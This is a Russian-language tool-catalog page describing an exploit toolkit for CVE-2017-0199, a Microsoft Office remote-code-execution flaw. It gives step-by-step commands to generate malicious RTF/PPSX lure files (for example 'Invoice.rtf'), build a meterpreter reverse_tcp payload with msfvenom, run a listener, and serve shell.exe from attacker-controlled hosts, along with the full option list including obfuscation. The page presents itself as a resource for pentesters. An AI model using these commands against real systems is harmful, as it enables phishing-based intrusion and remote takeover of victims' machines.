Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. | Kitploit
Инструменты/GitHubGitHub/bhdresh/cve-2017-0199
Payload GenerationExploitationWeb Application ExploitationMalware AnalysisPenetration TestingLearning & Education
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

Репозиторий
7242568 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

Поделиться

Эксплойт-тулкит CVE-2017-0199 - v4.0

Эксплойт-тулкит CVE-2017-0199 - v4.0 — это удобный скрипт на Python, который предоставляет пентестерам и исследователям безопасности быстрый и эффективный способ тестирования RCE в Microsoft Office. Он может сгенерировать вредоносный RTF/PPSX-файл и доставить metasploit / meterpreter / другие полезные нагрузки жертве без сложной настройки.

Отказ от ответственности

Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяются стандартные оговорки, особенно тот факт, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Ни автор, ни какой-либо интернет-провайдер не несёт ОТВЕТСТВЕННОСТИ за содержание или неправомерное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.п.), причинённый использованием этих программ, не является ответственностью bhdresh.

Наконец, это личная разработка, пожалуйста, уважайте её философию и не используйте её во вред!

Лицензия

Лицензия CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Примечания к релизу:

В скрипт добавлены следующие возможности

root@kitploit:~
- Генерация вредоносного PPSX-файла
- Режим эксплуатации для сгенерированного PPSX-файла
- Обновлён template.ppsx

Версия: Python 2.7.13

Сценарий 1: Доставка локальной полезной нагрузки

Примеры команд
root@kitploit:~
1) Создать вредоносный RTF-файл
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Необязательно, при использовании MSF-полезной нагрузки): Создать полезную нагрузку metasploit и запустить обработчик
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запустить тулкит в режиме эксплуатации для доставки локальной полезной нагрузки
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Диаграмма последовательности

alt tag

Сценарий 2: Доставка удалённой полезной нагрузки

Примеры команд
root@kitploit:~
1) Создать вредоносный RTF-файл
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Запустить тулкит в режиме эксплуатации для доставки удалённой полезной нагрузки
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Диаграмма последовательности

alt tag

Сценарий 3: Доставка пользовательского HTA-файла

Примеры команд
root@kitploit:~
1) Создать вредоносный RTF-файл
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Запустить тулкит в режиме эксплуатации для доставки пользовательского HTA-файла
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Диаграмма последовательности

alt tag

Аргументы командной строки:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Это удобный набор инструментов для эксплуатации CVE-2017-0199 (удалённое выполнение кода в Microsoft Office)

Режимы:

-M gen                                          Создать только вредоносный файл

     Создать вредоносный RTF/PPSX-файл:

      -w <Filename.rtf/Filename.ppsx>     Имя вредоносного RTF/PPSX-файла (передайте этот файл жертве).

      -u <http://attacker.com/test.hta>   Путь к HTA/SCT-файлу. Обычно это домен или IP-адрес, где запущен этот 
                                      инструмент.
                                      Например, http://attackerip.com/test.doc (этот URL будет включён в 	                                              вредоносный RTF/PPSX-файл и будет запрошен, как только жертва откроет вредоносный RTF-файл.
      -t RTF|PPSX (по умолчанию = RTF)   Тип создаваемого файла.
      -x 0|1  (по умолчанию = 0)               Создать обфусцированный RTF-файл. 0 = отключено, 1 = включено.

				      
-M exp                                          Запуск режима эксплуатации

     Эксплуатация:
 
      -t RTF|PPSX (по умолчанию = RTF)   Тип файла для эксплуатации.
      -H </tmp/custom>                Локальный путь к пользовательскому HTA/SCT-файлу, который необходимо доставить и выполнить на цели.
                                          ПРИМЕЧАНИЕ: Эта опция не доставляет полезные нагрузки, указанные в опциях "-e" и "-l"
					  
      -p <TCP port:Default 80>            Номер локального порта.

      -e <http://attacker.com/shell.exe>  Путь к исполняемому файлу / meterpreter shell / полезной нагрузке, которую необходимо выполнить на цели.

      -l </tmp/shell.exe>                 Если полезная нагрузка размещена локально, укажите локальный путь к исполняемому файлу / meterpreter shell / полезной нагрузке.

Благодарности

@nixawk за пример RTF, @Li Haifei, @bhdresh

Ошибки, проблемы, запросы функций

Очевидно, я не разработчик на полную ставку, так что возможны сбои.

Пожалуйста, сообщайте об ошибках и проблемах через https://github.com/bhdresh/CVE-2017-0199/issues/new

Скачать инструмент